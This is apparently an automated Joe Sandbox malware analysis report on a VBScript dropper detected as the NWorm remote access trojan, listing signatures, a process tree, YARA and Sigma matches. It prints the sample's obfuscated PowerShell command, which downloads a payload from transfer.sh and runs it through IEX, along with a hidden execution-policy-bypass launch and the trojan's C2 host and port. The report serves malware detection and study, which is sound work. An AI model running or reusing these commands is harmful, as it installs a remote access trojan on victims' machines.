Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YBAXAKQXVYWIXQJDE.VBS

Overview

General Information

Sample Name:YBAXAKQXVYWIXQJDE.VBS
Analysis ID:585402
MD5:40f92eb4b46a3430167477d11dec4c9e
SHA1:515ad5cac3f5b9ed1e7a7e14d53a191a12193984
SHA256:8c4477fd5129d549aabcbbcab1950965f7f0e0c934a60043dc7d27e57252868f
Tags:N-W0rmvbs
Infos:

Detection

NWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected NWorm
Writes to foreign memory regions
Bypasses PowerShell execution policy
Very long command line found
Creates processes via WMI
Suspicious powershell command line found
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Obfuscated command line found
Creates an undocumented autostart registry key
C2 URLs / IPs found in malware configuration
Uses dynamic DNS services
Sigma detected: Powerup Write Hijack DLL
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious aspnet_compiler.exe Execution
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Change PowerShell Policies to an Unsecure Level
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 7032 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\YBAXAKQXVYWIXQJDE.VBS" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • powershell.exe (PID: 7112 cmdline: POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_b)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_C)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_i)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_n)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_t)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_Ne)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_t)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_.W)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''));$XSZAJXGNTVXKGOTPRJHWCIHRASQAUGABFPPDDYLDBUZUPFYQNSEEYDEHTDNZZCSFRCCYNJSVWVRFJIARKQAHKFABUCJNYFCWGTE=('{2}{0}{1}' -f'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<w-O-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<b-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<j-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<e-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<c-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<t $-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''),'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<BB-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<).$H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<B(-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<$H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<x)-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''),'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<I-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<`E-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<`X(-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<Ne-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''));$HBBBBB = ($XSZAJXGNTVXKGOTPRJHWCIHRASQAUGABFPPDDYLDBUZUPFYQNSEEYDEHTDNZZCSFRCCYNJSVWVRFJIARKQAHKFABUCJNYFCWGTE -Join '')|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
      • aspnet_compiler.exe (PID: 6880 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup
{"Host": "nyanwmoney.duckdns.org", "Port": "8891", "Mutex": "594274bc", "Version": "v0.3.8", "Network Seprator": "|NW|"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\ICPDRCYNSQCDVKBIWIFZCD\ICPDRCYNSQCDVKBIWIFZCD.batPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x26:$sb3: -WIndoWSTYLe HiDdeN
  • 0x1a:$sc1: -Nop
  • 0x1f:$sd1: -NonI
  • 0x3a:$se3: -ExecutionPolicy Bypass
SourceRuleDescriptionAuthorStrings
0000000B.00000000.526861512.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_NWormYara detected NWormJoe Security
    0000000B.00000000.526861512.0000000000402000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
    • 0x2dec:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
    • 0x2e50:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
    • 0x2e48:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
    00000002.00000002.945992351.000001EE646CA000.00000004.00000800.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
    • 0x2375:$sb3: -WIndoWSTYLe HiDdeN
    • 0x2369:$sc1: -Nop
    • 0x236e:$sd1: -NonI
    • 0x2389:$se3: -ExecutionPolicy Bypass
    00000002.00000002.953420708.000001EE7C619000.00000004.00000020.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
    • 0xd012:$sb3: -WIndoWSTYLe HiDdeN
    • 0xd006:$sc1: -Nop
    • 0xd00b:$sd1: -NonI
    • 0xd026:$se3: -ExecutionPolicy Bypass
    00000002.00000002.947928671.000001EE64A74000.00000004.00000800.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
    • 0xe:$sb3: -WIndoWSTYLe HiDdeN
    • 0x18fe:$sb3: -WIndoWSTYLe HiDdeN
    • 0x2:$sc1: -Nop
    • 0x18f2:$sc1: -Nop
    • 0x7:$sd1: -NonI
    • 0x18f7:$sd1: -NonI
    • 0x22:$se3: -ExecutionPolicy Bypass
    • 0x1912:$se3: -ExecutionPolicy Bypass
    Click to see the 16 entries
    SourceRuleDescriptionAuthorStrings
    11.0.aspnet_compiler.exe.400000.0.unpackJoeSecurity_NWormYara detected NWormJoe Security
      11.0.aspnet_compiler.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
      • 0x2fec:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
      • 0x3050:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
      • 0x3048:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
      11.0.aspnet_compiler.exe.400000.0.unpackMALWARE_Win_NWormDetects NWorm/N-W0rm payloadditekSHen
      • 0x1f6d:$id1: N-W0rm
      • 0x2558:$id1: N-W0rm
      • 0x3247:$x1: pongPing
      • 0x3259:$x2: |NW|
      • 0x2e70:$s1: runFile
      • 0x2e80:$s2: runUrl
      • 0x2ed0:$s3: killer
      • 0x2ef0:$s4: powershell
      • 0x30ac:$s5: wscript.exe
      • 0x2f08:$s6: ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File "
      • 0x30c5:$s7: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
      • 0x31e7:$s8: Start-Sleep -Seconds 1.5; Remove-Item -Path '
      11.0.aspnet_compiler.exe.400000.4.unpackJoeSecurity_NWormYara detected NWormJoe Security
        11.0.aspnet_compiler.exe.400000.4.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
        • 0x2fec:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
        • 0x3050:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
        • 0x3048:$s2: ecnOnuR\noisreVtnerruC\swodniW\tfosorciM
        Click to see the 22 entries
        SourceRuleDescriptionAuthorStrings
        amsi64_7112.amsi.csvPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
        • 0xdcab:$sb3: -WIndoWSTYLe HiDdeN
        • 0x2e75b:$sb3: -WIndoWSTYLe HiDdeN
        • 0xdc9f:$sc1: -Nop
        • 0x2e74f:$sc1: -Nop
        • 0xdca4:$sd1: -NonI
        • 0x2e754:$sd1: -NonI
        • 0xdcbf:$se3: -ExecutionPolicy Bypass
        • 0x2e76f:$se3: -ExecutionPolicy Bypass

        System Summary

        barindex
        Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7112, TargetFilename: C:\ProgramData\ICPDRCYNSQCDVKBIWIFZCD\ICPDRCYNSQCDVKBIWIFZCD.bat
        Source: Process startedAuthor: frack113: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6592, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 6880
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=
        Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132912735750454997.7112.DefaultAppDomain.powershell

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
